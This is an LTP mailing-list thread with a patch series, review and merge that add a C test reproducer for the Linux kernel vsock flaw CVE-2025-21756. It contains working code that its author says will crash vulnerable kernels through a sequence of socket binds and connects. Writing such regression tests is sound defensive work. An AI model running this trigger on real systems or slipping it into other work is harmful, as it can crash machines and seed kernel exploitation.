[LTP] [PATCH v2 0/2] cve-2025-21756 reproducer

[LTP] [PATCH v2 0/2] cve-2025-21756 reproducer

[Andrea Cervesato]

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v2:
- fallback definition of sockaddr_vm
- check for tainted system if kernel survived after test
- Link to v1: https://lore.kernel.org/r/20250922-cve-2025-21756-v1-1-074da211288a@suse.com

---
Andrea Cervesato (2):
      lapi: add struct sockaddr_vm fallback
      cve: add test reproducer for cve-2025-21756

 configure.ac                   |  2 +
 include/lapi/vm_sockets.h      | 17 ++++++++
 runtest/cve                    |  1 +
 testcases/cve/.gitignore       |  1 +
 testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 116 insertions(+)
---
base-commit: 514dd3b48fdb024a18657b56fe30cea28541c0d0
change-id: 20250922-cve-2025-21756-e1afcda7b2d4

Best regards,
-- 
Andrea Cervesato <andrea.cervesato@suse.com>


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

[LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback

[Andrea Cervesato]

From: Andrea Cervesato <andrea.cervesato@suse.com>

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
 configure.ac              |  2 ++
 include/lapi/vm_sockets.h | 17 +++++++++++++++++
 2 files changed, 19 insertions(+)

diff --git a/configure.ac b/configure.ac
index 62ae27d494474fe342b1cceeac7f4c21c0b1028c..813f4c8525ea8f79852a419375ad797cb9fe2f50 100644
--- a/configure.ac
+++ b/configure.ac
@@ -270,6 +270,8 @@ AC_CHECK_TYPES([struct file_attr],,,[#include <linux/fs.h>])
 
 AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>])
 
+AC_CHECK_TYPES([struct sockaddr_vm],,,[#include <linux/vm_sockets.h>])
+
 # Tools knobs
 
 # Bash
diff --git a/include/lapi/vm_sockets.h b/include/lapi/vm_sockets.h
index 07884e538688569b5325b251fd629f20e44c1cdb..fda8c3156dc34b39fc2e91fba090bff00e209fc0 100644
--- a/include/lapi/vm_sockets.h
+++ b/include/lapi/vm_sockets.h
@@ -7,6 +7,7 @@
 #define LAPI_VM_SOCKETS_H__
 
 #include <sys/socket.h>
+#include "config.h"
 
 #if HAVE_LINUX_VM_SOCKETS_H
 #  include <linux/vm_sockets.h>
@@ -16,4 +17,20 @@
 #  define VMADDR_CID_LOCAL 1
 #endif
 
+#ifndef HAVE_STRUCT_SOCKADDR_VM
+struct sockaddr_vm {
+	unsigned short svm_family;
+	unsigned short svm_reserved1;
+	unsigned int svm_port;
+	unsigned int svm_cid;
+	unsigned char svm_flags;
+	unsigned char svm_zero[sizeof(struct sockaddr) -
+			       sizeof(sa_family_t) -
+			       sizeof(unsigned short) -
+			       sizeof(unsigned int) -
+			       sizeof(unsigned int) -
+			       sizeof(unsigned char)];
+};
+#endif
+
 #endif /* LAPI_VM_SOCKETS_H__ */

-- 
2.51.0


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

[LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756

[Andrea Cervesato]

From: Andrea Cervesato <andrea.cervesato@suse.com>

This test is verifying kernel commit fcdd2242c023 "vsock: Keep the
binding until socket destruction" merged inside v6.14.

Beware, it will crash the system!

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
 runtest/cve                    |  1 +
 testcases/cve/.gitignore       |  1 +
 testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 97 insertions(+)

diff --git a/runtest/cve b/runtest/cve
index 6d575aa2165bcd46e5ca36a07db33f69a91bd94a..c3ecd74dd9f837924b810b7b431ebb911d809966 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -92,3 +92,4 @@ cve-2020-25704 perf_event_open03
 cve-2022-0185 fsconfig03
 cve-2022-4378 cve-2022-4378
 cve-2025-38236 cve-2025-38236
+cve-2025-21756 cve-2025-21756
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 8eb17ce56b01070e47917f9bb44cf146c0c5b338..dc1dad5b0d0d02a3ab57e72516c33ee7949c8431 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -14,3 +14,4 @@ cve-2022-4378
 icmp_rate_limit01
 tcindex01
 cve-2025-38236
+cve-2025-21756
diff --git a/testcases/cve/cve-2025-21756.c b/testcases/cve/cve-2025-21756.c
new file mode 100644
index 0000000000000000000000000000000000000000..80fb84c473207fb2497f6ca6bb53166f0b1734cc
--- /dev/null
+++ b/testcases/cve/cve-2025-21756.c
@@ -0,0 +1,95 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2025 Andrea Cervesato <andrea.cervesato@suse.com>
+ */
+
+/*\
+ * Test for CVE-2025-21756 fixed in kernel v6.14:
+ * fcdd2242c023 vsock: Keep the binding until socket destruction
+ *
+ * Reproducer based on:
+ * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
+ *
+ * Beware, this test will crash the system.
+ */
+
+#include "tst_test.h"
+#include "lapi/vm_sockets.h"
+
+#define MAX_PORT_RETRIES	24
+#define VMADDR_CID_NONEXISTING	42
+
+static int vsock_bind(unsigned int cid, unsigned int port, int type)
+{
+	int sock;
+
+	struct sockaddr_vm sa = {
+		.svm_family = AF_VSOCK,
+		.svm_cid = cid,
+		.svm_port = port,
+	};
+
+	sock = SAFE_SOCKET(AF_VSOCK, type, 0);
+
+	if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
+		if (errno == EINVAL)
+			tst_brk(TCONF, "VM socket is not supported");
+
+		tst_brk(TBROK | TERRNO, "bind() error");
+	}
+
+	return sock;
+}
+
+static void run(void)
+{
+	int sockets[MAX_PORT_RETRIES];
+	struct sockaddr_vm addr;
+	int socket, sock_count;
+	socklen_t alen;
+
+	socket = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);
+
+	alen = sizeof(addr);
+	SAFE_GETSOCKNAME(socket, (struct sockaddr *)&addr, &alen);
+
+	for (sock_count = 0; sock_count < MAX_PORT_RETRIES; ++sock_count) {
+		sockets[sock_count] = vsock_bind(VMADDR_CID_ANY,
+				   ++addr.svm_port, SOCK_SEQPACKET);
+	}
+
+	SAFE_CLOSE(socket);
+
+	socket = SAFE_SOCKET(AF_VSOCK, SOCK_SEQPACKET, 0);
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #1 success");
+
+	addr.svm_cid = VMADDR_CID_NONEXISTING;
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #2 success");
+
+	addr.svm_cid = VMADDR_CID_LOCAL;
+	addr.svm_port = VMADDR_PORT_ANY;
+
+	/* Vulnerable system may crash now. */
+	SAFE_BIND(socket, (struct sockaddr *)&addr, alen);
+	SAFE_CLOSE(socket);
+
+	if (tst_taint_check())
+		tst_res(TFAIL, "Kernel is vulnerable");
+	else
+		tst_res(TPASS, "Kernel survived after socket unbinding");
+
+	while (sock_count--)
+		SAFE_CLOSE(sockets[sock_count]);
+}
+
+static struct tst_test test = {
+	.test_all = run,
+	.taint_check = TST_TAINT_W | TST_TAINT_D,
+	.tags = (const struct tst_tag[]) {
+		{"linux-git", "fcdd2242c023"},
+		{"CVE", "2025-21756"},
+		{}
+	},
+};

-- 
2.51.0


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH v2 1/2] lapi: add struct sockaddr_vm fallback

[Cyril Hrubis]

Hi!
Reviewed-by: Cyril Hrubis <chrubis@suse.cz>

-- 
Cyril Hrubis
chrubis@suse.cz

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756

[Cyril Hrubis]

Hi!
> This test is verifying kernel commit fcdd2242c023 "vsock: Keep the
> binding until socket destruction" merged inside v6.14.
> 
> Beware, it will crash the system!
> 
> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
> ---
>  runtest/cve                    |  1 +
>  testcases/cve/.gitignore       |  1 +
>  testcases/cve/cve-2025-21756.c | 95 ++++++++++++++++++++++++++++++++++++++++++
>  3 files changed, 97 insertions(+)
> 
> diff --git a/runtest/cve b/runtest/cve
> index 6d575aa2165bcd46e5ca36a07db33f69a91bd94a..c3ecd74dd9f837924b810b7b431ebb911d809966 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -92,3 +92,4 @@ cve-2020-25704 perf_event_open03
>  cve-2022-0185 fsconfig03
>  cve-2022-4378 cve-2022-4378
>  cve-2025-38236 cve-2025-38236
> +cve-2025-21756 cve-2025-21756
> diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
> index 8eb17ce56b01070e47917f9bb44cf146c0c5b338..dc1dad5b0d0d02a3ab57e72516c33ee7949c8431 100644
> --- a/testcases/cve/.gitignore
> +++ b/testcases/cve/.gitignore
> @@ -14,3 +14,4 @@ cve-2022-4378
>  icmp_rate_limit01
>  tcindex01
>  cve-2025-38236
> +cve-2025-21756
> diff --git a/testcases/cve/cve-2025-21756.c b/testcases/cve/cve-2025-21756.c
> new file mode 100644
> index 0000000000000000000000000000000000000000..80fb84c473207fb2497f6ca6bb53166f0b1734cc
> --- /dev/null
> +++ b/testcases/cve/cve-2025-21756.c
> @@ -0,0 +1,95 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + * Copyright (c) 2025 Andrea Cervesato <andrea.cervesato@suse.com>
> + */
> +
> +/*\
> + * Test for CVE-2025-21756 fixed in kernel v6.14:
> + * fcdd2242c023 vsock: Keep the binding until socket destruction
> + *
> + * Reproducer based on:
> + * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
> + *
> + * Beware, this test will crash the system.
> + */
> +
> +#include "tst_test.h"
> +#include "lapi/vm_sockets.h"
> +
> +#define MAX_PORT_RETRIES	24
> +#define VMADDR_CID_NONEXISTING	42
> +
> +static int vsock_bind(unsigned int cid, unsigned int port, int type)
> +{
> +	int sock;
> +
> +	struct sockaddr_vm sa = {
> +		.svm_family = AF_VSOCK,
> +		.svm_cid = cid,
> +		.svm_port = port,
> +	};
> +
> +	sock = SAFE_SOCKET(AF_VSOCK, type, 0);

So this generally works all the way back to the oldest LTP supported
kernel? I would expect that we would need an EINVAL check here.

Otherwise:

Reviewed-by: Cyril Hrubis <chrubis@suse.cz>


-- 
Cyril Hrubis
chrubis@suse.cz

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756

[Andrea Cervesato via ltp]

On 9/23/25 1:55 PM, Cyril Hrubis wrote:
> So this generally works all the way back to the oldest LTP supported
> kernel? I would expect that we would need an EINVAL check here.

AF_VSOCK were defined in 3.10 (d021c344051a VSOCK: Introduce VM 
Sockets), so I guess we are pretty safe.
Should I merge it after the Review-by, or we should wait for the release?

- Andrea


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756

[Cyril Hrubis]

Hi!
> > So this generally works all the way back to the oldest LTP supported
> > kernel? I would expect that we would need an EINVAL check here.
> 
> AF_VSOCK were defined in 3.10 (d021c344051a VSOCK: Introduce VM 
> Sockets), so I guess we are pretty safe.

Ack.

> Should I merge it after the Review-by, or we should wait for the release?

As long as it passes the compilation CI I would be inclined to take it
in. The pros is that we get one more CVE reproducer and the cons are
that we add one buggy test, it shouldn't break more than that.

However that should be the last non-fix before the release.

-- 
Cyril Hrubis
chrubis@suse.cz

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH v2 2/2] cve: add test reproducer for cve-2025-21756

[Andrea Cervesato via ltp]

On 9/23/25 2:16 PM, Cyril Hrubis wrote:
> Hi!
>>> So this generally works all the way back to the oldest LTP supported
>>> kernel? I would expect that we would need an EINVAL check here.
>> AF_VSOCK were defined in 3.10 (d021c344051a VSOCK: Introduce VM
>> Sockets), so I guess we are pretty safe.
> Ack.
>
>> Should I merge it after the Review-by, or we should wait for the release?
> As long as it passes the compilation CI I would be inclined to take it
> in. The pros is that we get one more CVE reproducer and the cons are
> that we add one buggy test, it shouldn't break more than that.
>
> However that should be the last non-fix before the release.
>
Merged thanks!

- Andrea


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp